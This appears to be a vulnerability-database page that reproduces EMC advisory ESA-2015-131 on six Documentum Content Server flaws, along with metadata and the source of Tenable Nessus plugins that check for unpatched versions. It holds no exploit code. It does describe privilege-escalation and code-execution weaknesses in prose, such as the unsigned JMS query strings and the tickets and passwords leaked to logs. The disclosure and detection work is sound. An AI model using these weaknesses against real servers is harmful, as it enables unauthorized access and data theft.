ESA-2015-131: EMC Documentum Content Server Multiple Vulnerabilities

2015-08-24T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2015-131: EMC Documentum Content Server Multiple Vulnerabilities EMC Identifier: ESA-2015-131 CVE Identifier: CVE-2015-4531, CVE-2015-4532, CVE-2015-4533, CVE-2015-4534, CVE-2015-4535, CVE-2015-4536 Severity Rating: CVSS v2 Base Score: See below for individual scores for each CVE Affected products: • EMC Documentum Content Server prior to 7.0 • EMC Documentum Content Server 7.0 • EMC Documentum Content Server 7.1 • EMC Documentum Content Server 7.2 Summary: EMC Documentum Content Server contains multiple vulnerabilities that could be exploited by malicious users to compromise the Content Server in several ways. Details: EMC Documentum Content Server is susceptible to the following vulnerabilities: 1. Authenticated Content Server users with sysadmin privileges may potentially escalate their privileges to become a super-user due to improper authorization checks performed on subgroups that exists within the dm_superusers group and other privileged groups. This may potentially be exploited by a malicious attacker to gain unauthorized access to data or to perform unauthorized actions on Content Server. The previous fix for CVE-2014-4622 was incomplete. CVE ID: CVE-2015-4531 CVSS v2 Base Score: 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C) 2. Authenticated non-privileged Content Server users are allowed to run save RPC commands with super user privileges on arbitrary objects. This is due to improper user authorization checks and object type checks being performed on these objects. This may potentially be exploited by a malicious, authenticated non-privileged user to perform unauthorized actions on Content Server including executing arbitrary code. The previous fix for CVE-2014-2514 was incomplete. CVE ID: CVE-2015-4532 CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P) 3. Authenticated non-privileged Content Server users are allowed to execute arbitrary code with super user privileges via custom scripts. This is due to improper authorization checks being performed on the objects created. This may potentially be exploited to perform unauthorized actions on Content Server. The previous fix for CVE-2014-2513 was incomplete. CVE ID: CVE-2015-4533 CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P) 4. Content Server delegates execution of business logic to an embedded java application server called "Java Method Server" (JMS). JMS fails to properly validate digital signatures, leading to the possibility of arbitrary code execution on the Content Server. An attacker capable of crafting a digital signature for a query string without the method_verb parameter may be able to execute arbitrary code in Content Server in JMS context, depending on Java classes present in the classloader. CVE ID: CVE-2015-4534 CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:P/I:C/A:C) 5. Content Server delegates execution of business logic to an embedded java application server called "Java Method Server" (JMS). JMS logs login tickets in certain instances when the __debug_trace__ parameter is enabled. An attacker with access to or capable of hijacking Content Server logs may be able to obtain superuser tickets and privileges. CVE ID: CVE-2015-4535 CVSS v2 Base Score: 7.5 (AV:N/AC:M/Au:S/C:P/I:P/A:C) 6. When RPC tracing is enabled, obfuscated passwords of Content Server users with inline password authentication are posted to the log file in clear text. An attacker with access to Content Server log files can use the passwords to log-in as the compromised user. CVE ID: CVE-2015-4536 CVSS v2 Base Score: 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C) Resolution: The following versions contain the fixes for vulnerabilities described in CVE-2015-4531, CVE-2015-4532, CVE-2015-4533, CVE-2015-4534, CVE-2015-4535 • EMC Documentum Content Server 6.7SP1P32 or later • EMC Documentum Content Server 6.7SP2P25 or later • EMC Documentum Content Server 7.0P19 or later • EMC Documentum Content Server 7.1P16 or later • EMC Documentum Content Server 7.2P02 or later The following versions contain the fix for the vulnerability described in CVE-2015-4536 • EMC Documentum Content Server 7.0P20 or later • EMC Documentum Content Server 7.1P18 or later • EMC Documentum Content Server 7.2P02 or later EMC strongly recommends all customers to apply the patches at the earliest opportunity. Link to remedies: Registered EMC Online support customers can download software from https://emc.subscribenet.com/. Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. EMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. EMC Product Security Response Center security_alert@emc.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (Cygwin) iEYEARECAAYFAlXR2/MACgkQtjd2rKp+ALyjggCcCHtFP+E8efdEpb3L3AbR4pWz 7DQAn3Om9XRWTq8PLNFiCl61ZC8gDHrr =F2Hc -----END PGP SIGNATURE-----

{"id": "SECURITYVULNS:DOC:32408", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "ESA-2015-131: EMC Documentum Content Server Multiple Vulnerabilities", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n\r\nESA-2015-131: EMC Documentum Content Server Multiple Vulnerabilities\r\n\r\nEMC Identifier: ESA-2015-131\r\n\r\nCVE Identifier: CVE-2015-4531, CVE-2015-4532, CVE-2015-4533, CVE-2015-4534, CVE-2015-4535, CVE-2015-4536\r\n\r\nSeverity Rating: CVSS v2 Base Score: See below for individual scores for each CVE\r\n\r\nAffected products: \r\n\r\n\u2022\tEMC Documentum Content Server prior to 7.0\r\n\u2022\tEMC Documentum Content Server 7.0\r\n\u2022\tEMC Documentum Content Server 7.1\r\n\u2022\tEMC Documentum Content Server 7.2\r\n\r\nSummary: \r\n\r\nEMC Documentum Content Server contains multiple vulnerabilities that could be exploited by malicious users to compromise the Content Server in several ways.\r\n\r\nDetails: \r\n\r\nEMC Documentum Content Server is susceptible to the following vulnerabilities:\r\n\r\n1.\tAuthenticated Content Server users with sysadmin privileges may potentially escalate their privileges to become a super-user due to improper authorization checks performed on subgroups that exists within the dm_superusers group and other privileged groups. This may potentially be exploited by a malicious attacker to gain unauthorized access to data or to perform unauthorized actions on Content Server. The previous fix for CVE-2014-4622 was incomplete.\r\n\r\nCVE ID: CVE-2015-4531\r\n\r\nCVSS v2 Base Score: 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C)\r\n\r\n2.\tAuthenticated non-privileged Content Server users are allowed to run save RPC commands with super user privileges on arbitrary objects. This is due to improper user authorization checks and object type checks being performed on these objects. This may potentially be exploited by a malicious, authenticated non-privileged user to perform unauthorized actions on Content Server including executing arbitrary code. The previous fix for CVE-2014-2514 was incomplete.\r\n\r\nCVE ID: CVE-2015-4532\r\n\r\nCVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)\r\n\r\n3.\tAuthenticated non-privileged Content Server users are allowed to execute arbitrary code with super user privileges via custom scripts. This is due to improper authorization checks being performed on the objects created. This may potentially be exploited to perform unauthorized actions on Content Server. The previous fix for CVE-2014-2513 was incomplete. \r\n\r\nCVE ID: CVE-2015-4533 \r\n\r\nCVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)\r\n\r\n4.\tContent Server delegates execution of business logic to an embedded java application server called "Java Method Server" (JMS). JMS fails to properly validate digital signatures, leading to the possibility of arbitrary code execution on the Content Server. An attacker capable of crafting a digital signature for a query string without the method_verb parameter may be able to execute arbitrary code in Content Server in JMS context, depending on Java classes present in the classloader. \r\n\r\nCVE ID: CVE-2015-4534\r\nCVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:P/I:C/A:C)\r\n\r\n\r\n5.\tContent Server delegates execution of business logic to an embedded java application server called "Java Method Server" (JMS). JMS logs login tickets in certain instances when the __debug_trace__ parameter is enabled. An attacker with access to or capable of hijacking Content Server logs may be able to obtain superuser tickets and privileges. \r\n\r\nCVE ID: CVE-2015-4535\r\n\r\nCVSS v2 Base Score: 7.5 (AV:N/AC:M/Au:S/C:P/I:P/A:C)\r\n\r\n6.\tWhen RPC tracing is enabled, obfuscated passwords of Content Server users with inline password authentication are posted to the log file in clear text. An attacker with access to Content Server log files can use the passwords to log-in as the compromised user.\r\n\r\nCVE ID: CVE-2015-4536\r\nCVSS v2 Base Score: 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C)\r\n\r\nResolution: \r\n\r\nThe following versions contain the fixes for vulnerabilities described in CVE-2015-4531, CVE-2015-4532, CVE-2015-4533, CVE-2015-4534, CVE-2015-4535 \r\n\u2022\tEMC Documentum Content Server 6.7SP1P32 or later\r\n\u2022\tEMC Documentum Content Server 6.7SP2P25 or later\r\n\u2022\tEMC Documentum Content Server 7.0P19 or later\r\n\u2022\tEMC Documentum Content Server 7.1P16 or later\r\n\u2022\tEMC Documentum Content Server 7.2P02 or later\r\n\r\nThe following versions contain the fix for the vulnerability described in CVE-2015-4536\r\n\u2022\tEMC Documentum Content Server 7.0P20 or later\r\n\u2022\tEMC Documentum Content Server 7.1P18 or later\r\n\u2022\tEMC Documentum Content Server 7.2P02 or later\r\n\r\nEMC strongly recommends all customers to apply the patches at the earliest opportunity.\r\nLink to remedies:\r\n\r\nRegistered EMC Online support customers can download software from https://emc.subscribenet.com/.\r\n\r\nRead and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.\r\n\r\nFor an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nEMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.\r\n\r\n\r\nEMC Product Security Response Center\r\nsecurity_alert@emc.com\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlXR2/MACgkQtjd2rKp+ALyjggCcCHtFP+E8efdEpb3L3AbR4pWz\r\n7DQAn3Om9XRWTq8PLNFiCl61ZC8gDHrr\r\n=F2Hc\r\n-----END PGP SIGNATURE-----\r\n", "published": "2015-08-24T00:00:00", "modified": "2015-08-24T00:00:00", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32408", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-4535", "CVE-2014-2514", "CVE-2015-4533", "CVE-2015-4531", "CVE-2015-4534", "CVE-2014-4622", "CVE-2015-4536", "CVE-2014-2513", "CVE-2015-4532"], "immutableFields": [], "lastseen": "2018-08-31T11:11:01", "viewCount": 97, "enchantments": {"score": {"value": 1.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "cert", "idList": ["VU:315340"]}, {"type": "cve", "idList": ["CVE-2014-2513", "CVE-2014-2514", "CVE-2014-4622", "CVE-2015-4531", "CVE-2015-4532", "CVE-2015-4533", "CVE-2015-4534", "CVE-2015-4535", "CVE-2015-4536", "CVE-2017-7220", "CVE-2017-7221"]}, {"type": "exploitdb", "idList": ["EDB-ID:41928"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4023A919E9FB0AB63EBFE6682BDBFA0D"]}, {"type": "nessus", "idList": ["EMC_DOCUMENTUM_CONTENT_SERVER_ESA-2014-064.NASL", "EMC_DOCUMENTUM_CONTENT_SERVER_ESA-2014-091.NASL", "EMC_DOCUMENTUM_CONTENT_SERVER_ESA-2015-131.NASL", "EMC_DOCUMENTUM_CONTENT_SERVER_ESA-2015-131_V7_0.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132628", "PACKETSTORM:133143", "PACKETSTORM:133144", "PACKETSTORM:142301"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30958", "SECURITYVULNS:DOC:31099", "SECURITYVULNS:DOC:32402", "SECURITYVULNS:DOC:32405", "SECURITYVULNS:DOC:32406", "SECURITYVULNS:VULN:13831"]}, {"type": "zdt", "idList": ["1337DAY-ID-24074", "1337DAY-ID-24075"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-2513", "CVE-2014-2514", "CVE-2014-4622"]}, {"type": "exploitdb", "idList": ["EDB-ID:41928"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4023A919E9FB0AB63EBFE6682BDBFA0D"]}, {"type": "nessus", "idList": ["EMC_DOCUMENTUM_CONTENT_SERVER_ESA-2014-091.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132628"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32402"]}, {"type": "zdt", "idList": ["1337DAY-ID-24074", "1337DAY-ID-24075"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "epss": [{"cve": "CVE-2015-4535", "epss": "0.002830000", "percentile": "0.636560000", "modified": "2023-03-19"}, {"cve": "CVE-2014-2514", "epss": "0.009140000", "percentile": "0.804260000", "modified": "2023-03-19"}, {"cve": "CVE-2015-4533", "epss": "0.005060000", "percentile": "0.728430000", "modified": "2023-03-19"}, {"cve": "CVE-2015-4531", "epss": "0.002250000", "percentile": "0.589720000", "modified": "2023-03-19"}, {"cve": "CVE-2015-4534", "epss": "0.007700000", "percentile": "0.784970000", "modified": "2023-03-19"}, {"cve": "CVE-2014-4622", "epss": "0.003240000", "percentile": "0.660930000", "modified": "2023-03-20"}, {"cve": "CVE-2015-4536", "epss": "0.001380000", "percentile": "0.476610000", "modified": "2023-03-19"}, {"cve": "CVE-2014-2513", "epss": "0.009140000", "percentile": "0.804260000", "modified": "2023-03-19"}, {"cve": "CVE-2015-4532", "epss": "0.003200000", "percentile": "0.658670000", "modified": "2023-03-19"}], "vulnersScore": 1.2}, "_state": {"dependencies": 1678962961, "score": 1678963748, "affected_software_major_version": 0, "epss": 1679323282}, "_internal": {"score_hash": "abe25ebc7dd690df7cf003901cd855f4"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}

{"nessus": [{"lastseen": "2023-01-11T14:59:59", "description": "The version of EMC Documentum Content Server running on the remote host is affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists due to improper authorization checks performed on subgroups within the dm_superusers group. An authenticated, remote attacker can exploit this to gain super-user privileges, thus allowing access to data or unauthorized actions on the Content Server. Note that the previous fix for this issue (CVE-2014-4622) was incomplete. (CVE-2015-4531)\n\n - A privilege escalation vulnerability exists due to improper authorization and object type checks performed during the handling of RPC commands that involve the dm_bp_transition method. An authenticated, remote attacker can exploit this, by using a crafted script, to gain elevated privileges, thus allowing unauthorized actions, such as the execution of arbitrary code. Note that the previous fix for this issue (CVE-2014-2514) was incomplete. (CVE-2015-4532)\n\n - A privilege escalation vulnerability exists due to improper authorization checks during the handling of custom scripts. An authenticated, remote attacker can exploit this to gain elevated privileges, thus allowing unauthorized actions on the Content Server. Note that the previous fix for this issue (CVE-2014-2513) was incomplete. (CVE-2015-4533)\n\n - A remote code execution vulnerability exists due to the Java Method Server (JMS) not properly validating digital signatures for query strings without the 'method_verb' parameter. An authenticated, remote attacker can exploit this, via a crafted digital signature for a query string, to execute arbitrary code in the JMS context, depending on what Java classes are present in the classloader. (CVE-2015-4534)\n\n - An information disclosure vulnerability exists due to a flaw in the Java Method Server (JMS) in how login tickets are logged in certain instances when the\n __debug_trace__ parameter is enabled. An authenticated, remote attacker with access to the logs can exploit this to gain access to super-user tickets. (CVE-2015-4535)", "cvss3": {}, "published": "2015-08-19T00:00:00", "type": "nessus", "title": "EMC Documentum Content Server Multiple Vulnerabilities (ESA-2015-131)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2513", "CVE-2014-2514", "CVE-2014-4622", "CVE-2015-4531", "CVE-2015-4532", "CVE-2015-4533", "CVE-2015-4534", "CVE-2015-4535"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:emc:documentum_content_server"], "id": "EMC_DOCUMENTUM_CONTENT_SERVER_ESA-2015-131.NASL", "href": "https://www.tenable.com/plugins/nessus/85544", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85544);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-4531\",\n \"CVE-2015-4532\",\n \"CVE-2015-4533\",\n \"CVE-2015-4534\",\n \"CVE-2015-4535\"\n );\n script_bugtraq_id(\n 76409,\n 76410,\n 76411,\n 76413,\n 76414\n );\n\n script_name(english:\"EMC Documentum Content Server Multiple Vulnerabilities (ESA-2015-131)\");\n script_summary(english:\"Checks for the Documentum Content Server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of EMC Documentum Content Server running on the remote\nhost is affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists due to\n improper authorization checks performed on subgroups\n within the dm_superusers group. An authenticated, remote\n attacker can exploit this to gain super-user privileges,\n thus allowing access to data or unauthorized actions on\n the Content Server. Note that the previous fix for this\n issue (CVE-2014-4622) was incomplete. (CVE-2015-4531)\n\n - A privilege escalation vulnerability exists due to\n improper authorization and object type checks performed\n during the handling of RPC commands that involve the\n dm_bp_transition method. An authenticated, remote\n attacker can exploit this, by using a crafted script,\n to gain elevated privileges, thus allowing unauthorized\n actions, such as the execution of arbitrary code. Note\n that the previous fix for this issue (CVE-2014-2514) was\n incomplete. (CVE-2015-4532)\n\n - A privilege escalation vulnerability exists due to\n improper authorization checks during the handling of\n custom scripts. An authenticated, remote attacker can\n exploit this to gain elevated privileges, thus allowing\n unauthorized actions on the Content Server. Note that\n the previous fix for this issue (CVE-2014-2513) was\n incomplete. (CVE-2015-4533)\n\n - A remote code execution vulnerability exists due to the\n Java Method Server (JMS) not properly validating digital\n signatures for query strings without the 'method_verb'\n parameter. An authenticated, remote attacker can exploit\n this, via a crafted digital signature for a query\n string, to execute arbitrary code in the JMS context,\n depending on what Java classes are present in the\n classloader. (CVE-2015-4534)\n\n - An information disclosure vulnerability exists due to\n a flaw in the Java Method Server (JMS) in how login\n tickets are logged in certain instances when the\n __debug_trace__ parameter is enabled. An authenticated,\n remote attacker with access to the logs can exploit this\n to gain access to super-user tickets. (CVE-2015-4535)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2015/Aug/att-86/ESA-2015-131.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-4534\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:emc:documentum_content_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"emc_documentum_content_server_installed.nbin\");\n script_require_keys(\"installed_sw/EMC Documentum Content Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"emc_documentum.inc\");\n\napp_name = DOC_APP_NAME;\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nfixes = make_nested_list(\n make_list(\"6.7SP1P32\", DOC_NO_MIN),\n make_list(\"6.7SP2P25\"),\n make_list(\"7.0P19\"),\n make_list(\"7.1P16\"),\n make_list(\"7.2P02\")\n);\n\ndocumentum_check_and_report(install:install, fixes:fixes, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-18T14:37:29", "description": "The remote host is running a version of EMC Documentum Content Server that is affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to improper authorization checks. A remote, authenticated attacker can exploit this vulnerability to execute arbitrary code via a custom script.\n (CVE-2014-2513)\n\n - A remote code execution vulnerability exists due to improper authorization checks. A remote, authenticated attacker can exploit this vulnerability to execute arbitrary code via save RPC commands.\n (CVE-2014-2514)", "cvss3": {}, "published": "2014-09-11T00:00:00", "type": "nessus", "title": "EMC Documentum Content Server Multiple Vulnerabilities (ESA-2014-064)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "PARTIAL", "integrityImpact": "COMPLETE", "baseScore": 8.2, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2513", "CVE-2014-2514"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:emc:documentum_content_server"], "id": "EMC_DOCUMENTUM_CONTENT_SERVER_ESA-2014-064.NASL", "href": "https://www.tenable.com/plugins/nessus/77634", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77634);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-2513\", \"CVE-2014-2514\");\n script_bugtraq_id(68435, 68436);\n\n script_name(english:\"EMC Documentum Content Server Multiple Vulnerabilities (ESA-2014-064)\");\n script_summary(english:\"Checks for Documentum Content Server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of EMC Documentum Content Server\nthat is affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper authorization checks. A remote, authenticated\n attacker can exploit this vulnerability to execute\n arbitrary code via a custom script.\n (CVE-2014-2513)\n\n - A remote code execution vulnerability exists due to\n improper authorization checks. A remote, authenticated\n attacker can exploit this vulnerability to execute\n arbitrary code via save RPC commands.\n (CVE-2014-2514)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2014/Jul/att-23/ESA-2014-064.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:emc:documentum_content_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"emc_documentum_content_server_installed.nbin\");\n script_require_keys(\"installed_sw/EMC Documentum Content Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"emc_documentum.inc\");\n\napp_name = DOC_APP_NAME;\nget_install_count(app_name:app_name, exit_if_zero:TRUE);\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nfixes = make_nested_list(\n make_list(\"7.1P06\"),\n make_list(\"7.0P15\"),\n make_list(\"6.7SP2P15\"),\n make_list(\"6.7SP1P28\", DOC_NO_MIN)\n);\n\ndocumentum_check_and_report(install:install, fixes:fixes, severity:SECURITY_HOLE);\n", "cvss": {"score": 8.2, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:P"}}, {"lastseen": "2023-01-11T15:00:49", "description": "The version of EMC Documentum Content Server running on the remote host is affected an information disclosure vulnerability due to passwords being stored as plaintext in log files for users with inline authentication. An authenticated, remote attacker with access to the log files can exploit this to login using the password of a different user. Note that this issue is present only when RPC tracing is enabled.", "cvss3": {}, "published": "2015-08-19T00:00:00", "type": "nessus", "title": "EMC Documentum Content Server Information Disclosure (ESA-2015-131)", "bulletinFamily": "scanner", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4536"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:emc:documentum_content_server"], "id": "EMC_DOCUMENTUM_CONTENT_SERVER_ESA-2015-131_V7_0.NASL", "href": "https://www.tenable.com/plugins/nessus/85545", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85545);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2015-4536\");\n script_bugtraq_id(76412);\n\n script_name(english:\"EMC Documentum Content Server Information Disclosure (ESA-2015-131)\");\n script_summary(english:\"Checks for the Documentum Content Server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of EMC Documentum Content Server running on the remote\nhost is affected an information disclosure vulnerability due to\npasswords being stored as plaintext in log files for users with\ninline authentication. An authenticated, remote attacker with access\nto the log files can exploit this to login using the password of a\ndifferent user. Note that this issue is present only when RPC tracing\nis enabled.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2015/Aug/att-86/ESA-2015-131.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-4536\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:emc:documentum_content_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"emc_documentum_content_server_installed.nbin\");\n script_require_keys(\"installed_sw/EMC Documentum Content Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"emc_documentum.inc\");\n\napp_name = DOC_APP_NAME;\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nfixes = make_nested_list(\n make_list(\"7.0P20\"),\n make_list(\"7.1P18\"),\n make_list(\"7.2P02\")\n);\n\ndocumentum_check_and_report(install:install, fixes:fixes, severity:SECURITY_NOTE);\n", "cvss": {"score": 3.5, 